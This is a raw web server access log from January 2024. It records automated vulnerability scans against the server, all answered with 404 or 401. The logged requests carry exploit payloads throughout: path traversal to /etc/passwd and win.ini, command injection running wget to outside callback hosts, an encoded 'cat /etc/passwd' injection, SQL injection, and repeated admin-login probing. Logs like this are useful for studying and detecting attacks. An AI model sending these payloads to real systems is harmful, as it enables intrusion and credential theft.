137.220.197.141 - - [21/Jan/2024:11:08:51 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:08:57 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:09:09 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:09:17 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:09:22 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:10:30 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:10:32 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:10:50 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:10:57 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsog4upoj88iqx5tw.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:10:58 +0100] "GET /WealthT24/GetImage?docDownloadPath=/etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:11:00 +0100] "GET /WealthT24/GetImage?docDownloadPath=c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:11:15 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:11:27 +0100] "GET /wp-content/plugins/insert-php/readme.txt HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:12:24 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:12:49 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:00 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:01 +0100] "GET /password.jsn HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:19 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:36 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:38 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:40 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:44 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:51 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsog3956yk7bmdfjc.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:13:55 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:14:15 +0100] "GET /login HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:14:17 +0100] "POST /Collector/appliancesettings/applianceSettingsFileTransfer HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:14:19 +0100] "GET /talari/app/files/2bECymEMAlhnesi4YLXr0DQMurO HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:14:21 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:14:23 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:14:58 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:15:56 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:16:00 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsog9gcduad177s8p.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:16:06 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:16:10 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:16:13 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsogb77ftmxysmdk5.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:16:16 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:16:19 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:16:26 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:16:37 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:17:04 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:17:17 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:17:19 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:17:21 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:17:23 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:17:42 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:17:50 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:17:52 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:18:05 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:18:10 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:18:12 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:18:14 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:18:17 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsog1as4zq65psbtm.oast.live) HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:18:25 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:18:36 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:18:48 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:19:00 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:19:13 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:19:36 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:19:52 +0100] "GET / HTTP/1.0" 404 952
137.220.197.141 - - [21/Jan/2024:11:19:54 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:19:55 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:00 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:02 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:04 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:06 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:08 +0100] "GET /cgi-bin/login_mgr.cgi?C1=ON&cmd=login&f_type=1&f_username=admin&port=80%7Cpwd%26id&pre_pwd=1&pwd=%20&ssl=1&ssl_port=1&username HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:13 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /CSS/Miniweb.css HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "POST /scripts/WPnBr.dll HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "POST /sdk HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /.git/HEAD HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET / HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET / HTTP/1.0" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "HEAD / HTTP/1.0" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /Portal/Portal.mwsl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /favicon.ico HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /docs/cplugError.html/ HTTP/1.1" 404 1018
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "HEAD / HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /nmaplowercheck1705832417 HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /pools/default/buckets HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET / HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET / HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /pools HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET / HTTP/1.0" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:17 +0100] "GET /inicio.jsa HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:18 +0100] "GET /HNAP1 HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:18 +0100] "GET /localstart.shtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:18 +0100] "GET /Bt5q HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /Portal0000.htm HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /indice.jhtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /server-status HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /__Additional HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /admin.php HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /home.php HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /menu.jhtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /inicio.cfm HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /menu.php HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:19 +0100] "GET /base.jsp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:20 +0100] "GET /main.html HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:20 +0100] "GET /readme.txt HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:20 +0100] "GET /admin.shtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:20 +0100] "GET /default.shtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:20 +0100] "GET /admin.pl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:20 +0100] "GET /admin.jsp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:20 +0100] "GET /index.pl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:21 +0100] "GET /inicio.html HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:21 +0100] "GET /indice.jsp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:21 +0100] "GET /home.cgi HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:21 +0100] "GET /index.aspx HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:21 +0100] "GET /localstart.cfm HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:21 +0100] "GET /home.shtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:21 +0100] "GET /inicio.pl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:22 +0100] "GET /admin.jsa HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:22 +0100] "GET /default.html HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:22 +0100] "GET /start.php HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:22 +0100] "GET /indice.asp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:22 +0100] "GET /home.pl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:22 +0100] "GET /inicio.cgi HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:23 +0100] "GET /admin.html HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:23 +0100] "GET /base.inc HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:23 +0100] "GET /localstart.cgi HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:23 +0100] "GET /main.jsa HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:23 +0100] "GET /admin.cgi HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:23 +0100] "GET /admin.cfm HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:23 +0100] "GET /menu.cfm HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:24 +0100] "GET /main.cgi HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:24 +0100] "GET /admin.aspx HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:24 +0100] "GET /index.html HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:24 +0100] "GET /home.jhtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:24 +0100] "GET /indice.cfm HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:24 +0100] "GET /menu.pl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:24 +0100] "GET /base.pl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:25 +0100] "GET /base.asp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:25 +0100] "GET /index.shtml HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:25 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:25 +0100] "GET /localstart.pl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:25 +0100] "GET /base.jsa HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:25 +0100] "GET /base.jhtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:25 +0100] "GET /index.jsp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:25 +0100] "GET /admin.asp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:26 +0100] "GET /menu.asp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:26 +0100] "GET /base.cgi HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:26 +0100] "GET /home.jsp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:26 +0100] "GET /menu.cgi HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:26 +0100] "GET /base.cfm HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:26 +0100] "GET /base.aspx HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:26 +0100] "GET /indice.shtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:27 +0100] "GET /indice.pl HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:27 +0100] "GET /main.jsp HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:27 +0100] "GET /start.jhtml HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:27 +0100] "GET /indice.php HTTP/1.1" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:29 +0100] "GET / HTTP/1.0" 404 952
172.105.246.139 - - [21/Jan/2024:11:20:29 +0100] "GET / HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:35 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:48 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:20:48 +0100] "GET /catalog.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:21:20 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:21:22 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:21:24 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:21:26 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:21:28 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:22:21 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:22:29 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:22:45 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:23:22 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:23:39 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:23:46 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:23:46 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:23:49 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:23:51 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:24:26 +0100] "GET /base_import/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:24:28 +0100] "GET /web/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:24:30 +0100] "GET /base/static/c:/windows/win.ini HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:24:55 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:24:56 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:25:32 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:25:44 +0100] "GET /action/usermanager.htm HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:26:32 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:26:43 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:26:56 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:26:58 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:27:05 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:27:19 +0100] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:28:10 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:29:09 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:29:23 +0100] "GET /cgi-bin/config.exp HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:30:22 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:30:26 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:30:35 +0100] "GET /install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=%3b%63%61%74%20%2f%65%74%63%2f%70%61%73%73%77%64%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:31:17 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:31:41 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:35:10 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:35:12 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:35:14 +0100] "POST /session_login.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:35:16 +0100] "POST /rpc.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:35:46 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:36:39 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:36:41 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:36:43 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:37:56 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:38:09 +0100] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:38:23 +0100] "GET /Collector/storagemgmt/apply?data%5B0%5D%5Bhost%5D=%60/bin/wget+http://cmm00rc3m87t5g88qsogpp3gejtq7fg15.oast.live%60&data%5B0%5D%5Bpath%5D=mypath&data%5B0%5D%5Btype%5D=mytype HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:39:18 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:40:34 +0100] "GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:40:37 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:40:43 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:40:44 +0100] "GET /Collector/nms/addModifyZTDProxy?ztd_server=127.0.0.1&ztd_port=3333&ztd_username=user&ztd_password=$(/bin/wget$IFShttp://cmm00rc3m87t5g88qsogcs89mmjqu651u.oast.live) HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:40:46 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:40:47 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:40:49 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:40:53 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:40:57 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:40:58 +0100] "POST /wp-json/visualizer/v1/upload-data HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:41:00 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:03 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:41:03 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
137.220.197.141 - - [21/Jan/2024:11:41:06 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:41:06 +0100] "GET /manager/html HTTP/1.1" 401 1833
137.220.197.141 - - [21/Jan/2024:11:41:08 +0100] "POST /apply_sec.cgi HTTP/1.1" 404 952
149.56.151.201 - - [21/Jan/2024:11:41:10 +0100] "GET /manager/html HTTP/1.1" 401 1833
149.56.151.201 - - [21/Jan/2024:11:41:14 +0100] "GET /manager/html HTTP/1.1" 401 1833
